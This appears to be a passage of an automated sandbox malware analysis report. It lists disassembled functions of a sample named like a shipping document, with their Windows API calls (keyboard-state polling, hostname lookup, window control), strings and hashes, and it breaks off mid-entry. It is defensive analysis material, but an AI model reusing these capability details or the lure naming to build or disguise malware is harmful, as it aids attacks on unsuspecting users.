mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 006C7B8C

Strings

play PlayMe wait, xrefs: 006C7B76
status PlayMe mode, xrefs: 006C7B3D
play PlayMe, xrefs: 006C7B87
alias PlayMe, xrefs: 006C7B1B
open , xrefs: 006C7AF1
close PlayMe, xrefs: 006C7B53, 006C7B80

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: SendString
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 890592661-1007645807
Opcode ID: b92b88693daab19bdc830309ff3b9b8aa7ab7e28a53543d2cb583c8649dd7ba3
Instruction ID: bde23458ec5b710d68efb9263ac84111c158290d8da7a5ddd37d80c0844f1295
Opcode Fuzzy Hash: b92b88693daab19bdc830309ff3b9b8aa7ab7e28a53543d2cb583c8649dd7ba3
Instruction Fuzzy Hash: AA11C4E164025979E770B765CC8AEFF7A7DEBD1B10F00051D7411A60C2DE741E49CAB0

Function 006C778F Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 006C7794

Part of subcall function 0069DC38: timeGetTime.WINMM(?,7694B400,006F58AB), ref: 0069DC3C

Sleep.KERNEL32(0000000A), ref: 006C77C0
EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 006C77E4
FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 006C7806
SetActiveWindow.USER32 ref: 006C7825
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 006C7833
SendMessageW.USER32(00000010,00000000,00000000), ref: 006C7852
Sleep.KERNEL32(000000FA), ref: 006C785D
IsWindow.USER32 ref: 006C7869
EndDialog.USER32(00000000), ref: 006C787A

Strings

BUTTON, xrefs: 006C77F8

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 165ec4700258c15698e1382955e57ceb6f6409f33c89747b906bbd303317fdac
Instruction ID: 0b5d6c88a182b81f35d83a666138a3c3cea3bc3774d3db61504f753bb68dd794
Opcode Fuzzy Hash: 165ec4700258c15698e1382955e57ceb6f6409f33c89747b906bbd303317fdac
Instruction Fuzzy Hash: 622129B4204309EFE7115FA0EC89F763B7AFB45349B00812EF51A96262CF699D11DE2C

Function 006D02EE Relevance: 18.3, APIs: 12, Instructions: 282comCOMMON

Download Yara Rule

APIs

Part of subcall function 0068936C: __swprintf.LIBCMT ref: 006893AB
Part of subcall function 0068936C: __itow.LIBCMT ref: 006893DF

CoInitialize.OLE32(00000000), ref: 006D034B
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 006D03DE
SHGetDesktopFolder.SHELL32(?), ref: 006D03F2
CoCreateInstance.OLE32(0070DA8C,00000000,00000001,00733CF8,?), ref: 006D043E
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 006D04AD
CoTaskMemFree.OLE32(?,?), ref: 006D0505
_memset.LIBCMT ref: 006D0542
SHBrowseForFolderW.SHELL32(?), ref: 006D057E
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 006D05A1
CoTaskMemFree.OLE32(00000000), ref: 006D05A8
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 006D05DF
CoUninitialize.OLE32(00000001,00000000), ref: 006D05E1

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: ef932867183dc8c7c9fc156278b8b2aca08d77a30f275dfafae93c3aee482542
Instruction ID: d17070003c0308406a382fd76ec54767c6696d4fe94e85282128c189026926ca
Opcode Fuzzy Hash: ef932867183dc8c7c9fc156278b8b2aca08d77a30f275dfafae93c3aee482542
Instruction Fuzzy Hash: B7B1E975A00209AFDB14DFA4C888EAEBBBAEF48314F148559F905EB351DB30ED41CB64

Function 006C2E5B Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 006C2ED6
SetKeyboardState.USER32(?), ref: 006C2F41
GetAsyncKeyState.USER32(000000A0), ref: 006C2F61
GetKeyState.USER32(000000A0), ref: 006C2F78
GetAsyncKeyState.USER32(000000A1), ref: 006C2FA7
GetKeyState.USER32(000000A1), ref: 006C2FB8
GetAsyncKeyState.USER32(00000011), ref: 006C2FE4
GetKeyState.USER32(00000011), ref: 006C2FF2
GetAsyncKeyState.USER32(00000012), ref: 006C301B
GetKeyState.USER32(00000012), ref: 006C3029
GetAsyncKeyState.USER32(0000005B), ref: 006C3052
GetKeyState.USER32(0000005B), ref: 006C3060

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: be062f4e3ccb912df1a0d1a4e8c3a60eb4c01651738a988410b83c528418180a
Instruction ID: e56d22c196dba570f7bc70df5b700c097f4af60bd48a8233da7373dcf10df760
Opcode Fuzzy Hash: be062f4e3ccb912df1a0d1a4e8c3a60eb4c01651738a988410b83c528418180a
Instruction Fuzzy Hash: AD51FC2160479929FB35DBA48820FFABFF6DF15340F08858DC9C2563C2DA549B4CC7A6

Function 006BED02 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 006BED1E
GetWindowRect.USER32(00000000,?), ref: 006BED30
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 006BED8E
GetDlgItem.USER32(?,00000002), ref: 006BED99
GetWindowRect.USER32(00000000,?), ref: 006BEDAB
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 006BEE01
GetDlgItem.USER32(?,000003E9), ref: 006BEE0F
GetWindowRect.USER32(00000000,?), ref: 006BEE20
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 006BEE63
GetDlgItem.USER32(?,000003EA), ref: 006BEE71
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 006BEE8E
InvalidateRect.USER32(?,00000000,00000001), ref: 006BEE9B

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: ea89eb01f082b7be6d1c957e548b8d048883a4999a48fd92780ef9f704129e61
Instruction ID: 718c0cc1c22e7a61380dad22dbad67bcc19dc4402523b3bba0f2f3b479f577e3
Opcode Fuzzy Hash: ea89eb01f082b7be6d1c957e548b8d048883a4999a48fd92780ef9f704129e61
Instruction Fuzzy Hash: 545111B1B00305AFDB18CFA9DD85AEEBBB6EB88740F148229F519D7290DB759D408B14

Function 0069B73E Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 0069B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0069B759,?,00000000,?,?,?,?,0069B72B,00000000,?), ref: 0069BA58

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0069B72B), ref: 0069B7F6
KillTimer.USER32(00000000,?,00000000,?,?,?,?,0069B72B,00000000,?,?,0069B2EF,?,?), ref: 0069B88D
DestroyAcceleratorTable.USER32(00000000), ref: 006FD8A6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0069B72B,00000000,?,?,0069B2EF,?,?), ref: 006FD8D7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0069B72B,00000000,?,?,0069B2EF,?,?), ref: 006FD8EE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0069B72B,00000000,?,?,0069B2EF,?,?), ref: 006FD90A
DeleteObject.GDI32(00000000), ref: 006FD91C

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 58a7fa67e55047b9490908afdba2e0185a8f1c0046388ca1648b055b78a76cc4
Instruction ID: 709425f9631f2b8a313ed5a63067f5054122ac4d62441828bc04910ae428c5f8
Opcode Fuzzy Hash: 58a7fa67e55047b9490908afdba2e0185a8f1c0046388ca1648b055b78a76cc4
Instruction Fuzzy Hash: 22619D30501704DFDF35AF94EA88B7577BBFB86311F15961EE1468AA60CB78A880CB49

Function 0069B40A Relevance: 18.1, APIs: 12, Instructions: 131COMMON

Download Yara Rule

APIs

Part of subcall function 0069B526: GetWindowLongW.USER32(?,000000EB), ref: 0069B537

GetSysColor.USER32(0000000F), ref: 0069B438

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 2796e4ea56bf3630ccd98cebbbdbf3fc1a99af18245ffac8292cb44eccb08bbd
Instruction ID: 227cae0e80f6c694803eec060ea5e6b2f5cb50012d5ecb1b9443c9823afffded
Opcode Fuzzy Hash: 2796e4ea56bf3630ccd98cebbbdbf3fc1a99af18245ffac8292cb44eccb08bbd
Instruction Fuzzy Hash: B241A630000104DBDF205F68ED49BF93BABAB05B20F158361FD658A6EADB348C41D765

Function 006C690B Relevance: 18.1, APIs: 12, Instructions: 113COMMON

Download Yara Rule

APIs

_wcschr.LIBCMT ref: 006C6923
_wcscpy.LIBCMT ref: 006C6934
__wsplitpath.LIBCMT ref: 006C6958
__wsplitpath.LIBCMT ref: 006C6979
_wcscpy.LIBCMT ref: 006C699B
_wcscpy.LIBCMT ref: 006C69B9
_wcscpy.LIBCMT ref: 006C69C7
_wcscat.LIBCMT ref: 006C69D6
_wcscat.LIBCMT ref: 006C6A2B
_wcscat.LIBCMT ref: 006C6A61
_wcscat.LIBCMT ref: 006C6A73

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
String ID:
API String ID: 136442275-0
Opcode ID: dd526701ebb0867d64c317ecb1b5e391f7bbe7412d96aa5b32823346c71fbf21
Instruction ID: de48debdde8245308ea8918e3d6b0ac0df7dec85f38d73af2bbbee1dcf325395
Opcode Fuzzy Hash: dd526701ebb0867d64c317ecb1b5e391f7bbe7412d96aa5b32823346c71fbf21
Instruction Fuzzy Hash: 7D41417684521CAEDFA1EB94CC41DDB73BDEF45310F0041EAB659A2041EA30ABD58F58

Function 006CD76A Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 180COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(0071DC00,0071DC00,0071DC00), ref: 006CD7CE
GetDriveTypeW.KERNEL32(?,00733A70,00000061), ref: 006CD898
_wcscpy.LIBCMT ref: 006CD8C2

Strings

unknown, xrefs: 006CD859
removable, xrefs: 006CD800
fixed, xrefs: 006CD816
network, xrefs: 006CD82C
all, xrefs: 006CD7D4
cdrom, xrefs: 006CD7EA
ramdisk, xrefs: 006CD842

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: 7aa945b12f59e8f4e990fa1da3f72a4d4202bcc4566c8eb58ae91a9202f9b963
Instruction ID: eee002fe900ece1ba9178d9b26aceb1415f723717e1f13eef6e29891923edfc9
Opcode Fuzzy Hash: 7aa945b12f59e8f4e990fa1da3f72a4d4202bcc4566c8eb58ae91a9202f9b963
Instruction Fuzzy Hash: D4516E35104300AFD750EF14D892FBAB7AAEF94314F10892DF5AA572A2EB31DD06CB56

Function 0068936C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 006893AB
__itow.LIBCMT ref: 006893DF

Part of subcall function 006A1557: _xtow@16.LIBCMT ref: 006A1578

Strings

%.15g, xrefs: 006893A5
True, xrefs: 006F4C8C
False, xrefs: 006F4C93
0x%p, xrefs: 006F4CAD

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: __itow__swprintf_xtow@16
String ID: %.15g$0x%p$False$True
API String ID: 1502193981-2263619337
Opcode ID: c20334ba67ac5bb3ca898ef1d94fa3d6aea32d54b1d0a75a077fa334ad1f7b56
Instruction ID: 7849a51eb05ff383ed129cd7bec2da92ac8279f4983258991955e14ef2115492
Opcode Fuzzy Hash: c20334ba67ac5bb3ca898ef1d94fa3d6aea32d54b1d0a75a077fa334ad1f7b56
Instruction Fuzzy Hash: C641E8715042089BEB24FB74D941EBA73FAEF49310F2445AEE14AD7682EA31D942CB20

Function 006EA1B6 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 006EA259
CreateCompatibleDC.GDI32(00000000), ref: 006EA260
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 006EA273
SelectObject.GDI32(00000000,00000000), ref: 006EA27B
GetPixel.GDI32(00000000,00000000,00000000), ref: 006EA286
DeleteDC.GDI32(00000000), ref: 006EA28F
GetWindowLongW.USER32(?,000000EC), ref: 006EA299
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 006EA2AD
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 006EA2B9

Strings

static, xrefs: 006EA1F1

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 800203a544f3310234d633d76bda450f6ffa6032896e0021163c5eeb5360bdf4
Instruction ID: c9ce8fd51ddfda142e03614888ea85175e73a1fbc3ba208885ce20c79a086322
Opcode Fuzzy Hash: 800203a544f3310234d633d76bda450f6ffa6032896e0021163c5eeb5360bdf4
Instruction Fuzzy Hash: 8331AE31101214EFDF215FA5DC49FEA3B6AFF09360F154314FA19A61A0CB36E811DB69

Function 006C6F02 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 006C6F1D
gethostname.WSOCK32(?,00000100), ref: 006C6F37
gethostbyname.WSOCK32(?), ref: 006C6F44
_wcscpy.LIBCMT ref: 006C6F6C
inet_ntoa.WSOCK32(?), ref: 006C6F8A
_strcat.LIBCMT ref: 006C6F98
_wcscpy.LIBCMT ref: 006C6FAF
WSACleanup.WSOCK32 ref: 006C6FBD
_wcscpy.LIBCMT ref: 006C6FCB

Strings

0.0.0.0, xrefs: 006C6F66

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 2620052-3771769585
Opcode ID: a5151feec7be94dea1a01bf2c7029c541e4560dc66336b5360927384720700de
Instruction ID: 94873a2d629ef84f67056435c8d9a0566c5f5ff1ce536135bb7d72bdae8d9955
Opcode Fuzzy Hash: a5151feec7be94dea1a01bf2c7029c541e4560dc66336b5360927384720700de
Instruction Fuzzy Hash: 1E112772504215AFDB25BBA0EC09FEA77AEEF44710F0041ADF015D2081EF74DE818A58

Function 006A500E Relevance: 16.8, APIs: 11, Instructions: 257COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006A5047

Part of subcall function 006A7C0E: __getptd_noexit.LIBCMT ref: 006A7C0E

__gmtime64_s.LIBCMT ref: 006A50E0
__gmtime64_s.LIBCMT ref: 006A5116
__gmtime64_s.LIBCMT ref: 006A5133
__allrem.LIBCMT ref: 006A5189
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006A51A5
__allrem.LIBCMT ref: 006A51BC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006A51DA
__allrem.LIBCMT ref: 006A51F1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006A520F
__invoke_watson.LIBCMT ref: 006A5280

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
Instruction ID: d4e029bc947714b4344d58c740f7a6e538628aafc002b734ab9f07a3c1866d8f
Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
Instruction Fuzzy Hash: 1E71B7B2A00B16ABD714FE78CC51BAAB3AAAF12764F14412DF512DA781E770DD408FD4

Function 006C4DDD Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006C4DF8
GetMenuItemInfoW.USER32(00741708,000000FF,00000000,00000030), ref: 006C4E59
SetMenuItemInfoW.USER32(00741708,00000004,00000000,00000030), ref: 006C4E8F
Sleep.KERNEL32(000001F4), ref: 006C4EA1
GetMenuItemCount.USER32(?), ref: 006C4EE5
GetMenuItemID.USER32(?,00000000), ref: 006C4F01
GetMenuItemID.USER32(?,-00000001), ref: 006C4F2B
GetMenuItemID.USER32(?,?), ref: 006C4F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 006C4FB6
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006C4FCA
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006C4FEB

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: b0267eb9b41fbb5a28f9e48ab773c8ad31de294a045a53cb31034b670d0bc67c
Instruction ID: c240d2f101c39f4e619317eb127a079c644aa4645070c708d4ebf712376efe33
Opcode Fuzzy Hash: b0267eb9b41fbb5a28f9e48ab773c8ad31de294a045a53cb31034b670d0bc67c
Instruction Fuzzy Hash: 10618B71900289AFEB21CFA4DC98EFE7BBAEB85304F14415DF851A3251DB35AD45CB20

Function 006E9C16 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 006E9C98
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 006E9C9B
GetWindowLongW.USER32(?,000000F0), ref: 006E9CBF
_memset.LIBCMT ref: 006E9CD0
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 006E9CE2
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 006E9D5A

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity
